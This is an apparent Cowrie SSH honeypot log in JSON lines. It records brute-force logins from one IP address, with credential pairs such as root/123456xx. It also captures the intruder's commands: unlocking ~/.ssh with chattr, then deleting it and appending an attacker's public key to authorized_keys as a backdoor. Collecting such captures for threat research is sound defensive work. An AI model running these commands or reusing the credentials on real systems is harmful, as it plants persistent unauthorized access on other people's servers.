{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:53:29.560807Z","src_ip":"212.227.235.229","session":"103c4d9c2955"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:53:29.561667Z","src_ip":"212.227.235.229","session":"103c4d9c2955"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33270,"dst_ip":"1.2.3.4","dst_port":22,"session":"54f4fde1b127","protocol":"ssh","message":"New connection: 212.227.235.229:33270 (1.2.3.4:22) [session: 54f4fde1b127]","sensor":"my-vps","timestamp":"2025-09-08T22:53:29.877827Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:53:29.878773Z","src_ip":"212.227.235.229","session":"54f4fde1b127"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:53:30.204609Z","src_ip":"212.227.235.229","session":"54f4fde1b127"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:53:31.550055Z","src_ip":"212.227.235.229","session":"54f4fde1b127"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:53:32.878479Z","src_ip":"212.227.235.229","session":"54f4fde1b127"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34564,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ef914374dca","protocol":"ssh","message":"New connection: 212.227.235.229:34564 (1.2.3.4:22) [session: 7ef914374dca]","sensor":"my-vps","timestamp":"2025-09-08T22:53:33.202936Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:53:33.203713Z","src_ip":"212.227.235.229","session":"7ef914374dca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:53:33.529839Z","src_ip":"212.227.235.229","session":"7ef914374dca"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:53:34.875002Z","src_ip":"212.227.235.229","session":"7ef914374dca"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:53:35.203021Z","src_ip":"212.227.235.229","session":"7ef914374dca"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:53:35.212145Z","src_ip":"212.227.235.229","session":"103c4d9c2955"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59890,"dst_ip":"1.2.3.4","dst_port":22,"session":"2442813a126e","protocol":"ssh","message":"New connection: 212.227.235.229:59890 (1.2.3.4:22) [session: 2442813a126e]","sensor":"my-vps","timestamp":"2025-09-08T22:53:41.132890Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:53:41.133719Z","src_ip":"212.227.235.229","session":"2442813a126e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:53:41.443661Z","src_ip":"212.227.235.229","session":"2442813a126e"}
{"eventid":"cowrie.login.failed","username":"tunnel","password":"changeme","message":"login attempt [tunnel/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T22:53:42.726156Z","src_ip":"212.227.235.229","session":"2442813a126e"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:53:44.038312Z","src_ip":"212.227.235.229","session":"2442813a126e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58280,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5b8a4773579","protocol":"ssh","message":"New connection: 212.227.235.229:58280 (1.2.3.4:22) [session: e5b8a4773579]","sensor":"my-vps","timestamp":"2025-09-08T22:53:59.260847Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:53:59.276330Z","src_ip":"212.227.235.229","session":"e5b8a4773579"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:53:59.538771Z","src_ip":"212.227.235.229","session":"e5b8a4773579"}
{"eventid":"cowrie.login.success","username":"root","password":"123456xx","message":"login attempt [root/123456xx] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:54:00.543267Z","src_ip":"212.227.235.229","session":"e5b8a4773579"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:01.041636Z","src_ip":"212.227.235.229","session":"e5b8a4773579"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:54:01.042375Z","src_ip":"212.227.235.229","session":"e5b8a4773579"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:54:01.043250Z","src_ip":"212.227.235.229","session":"e5b8a4773579"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:01.283990Z","src_ip":"212.227.235.229","session":"e5b8a4773579"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:01.859154Z","src_ip":"212.227.235.229","session":"e5b8a4773579"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:54:01.859890Z","src_ip":"212.227.235.229","session":"e5b8a4773579"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:54:02.046010Z","src_ip":"212.227.235.229","session":"e5b8a4773579"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:02.046985Z","src_ip":"212.227.235.229","session":"e5b8a4773579"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59366,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cb6e76fd916","protocol":"ssh","message":"New connection: 212.227.235.229:59366 (1.2.3.4:22) [session: 6cb6e76fd916]","sensor":"my-vps","timestamp":"2025-09-08T22:54:02.261243Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:54:02.279920Z","src_ip":"212.227.235.229","session":"6cb6e76fd916"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56288,"dst_ip":"1.2.3.4","dst_port":22,"session":"7aaa795797a7","protocol":"ssh","message":"New connection: 212.227.235.229:56288 (1.2.3.4:22) [session: 7aaa795797a7]","sensor":"my-vps","timestamp":"2025-09-08T22:54:02.342357Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:54:02.343027Z","src_ip":"212.227.235.229","session":"7aaa795797a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:54:02.444052Z","src_ip":"212.227.235.229","session":"7aaa795797a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:54:02.531100Z","src_ip":"212.227.235.229","session":"6cb6e76fd916"}
{"eventid":"cowrie.login.failed","username":"usertest","password":"abc123","message":"login attempt [usertest/abc123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:54:02.883019Z","src_ip":"212.227.235.229","session":"7aaa795797a7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:54:03.531752Z","src_ip":"212.227.235.229","session":"6cb6e76fd916"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:03.984484Z","src_ip":"212.227.235.229","session":"7aaa795797a7"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:04.790140Z","src_ip":"212.227.235.229","session":"6cb6e76fd916"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60412,"dst_ip":"1.2.3.4","dst_port":22,"session":"96435a081174","protocol":"ssh","message":"New connection: 212.227.235.229:60412 (1.2.3.4:22) [session: 96435a081174]","sensor":"my-vps","timestamp":"2025-09-08T22:54:05.011589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:54:05.027568Z","src_ip":"212.227.235.229","session":"96435a081174"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50466,"dst_ip":"1.2.3.4","dst_port":22,"session":"49ae08d656e5","protocol":"ssh","message":"New connection: 212.227.235.229:50466 (1.2.3.4:22) [session: 49ae08d656e5]","sensor":"my-vps","timestamp":"2025-09-08T22:54:05.030376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:54:05.031012Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:54:05.281723Z","src_ip":"212.227.235.229","session":"96435a081174"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:54:06.244406Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:54:06.272683Z","src_ip":"212.227.235.229","session":"96435a081174"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:06.527353Z","src_ip":"212.227.235.229","session":"e5b8a4773579"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:06.528471Z","src_ip":"212.227.235.229","session":"96435a081174"}
{"eventid":"cowrie.login.success","username":"root","password":"123456xx","message":"login attempt [root/123456xx] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:54:08.204192Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:09.274526Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:54:09.275864Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:54:09.276801Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:09.526830Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
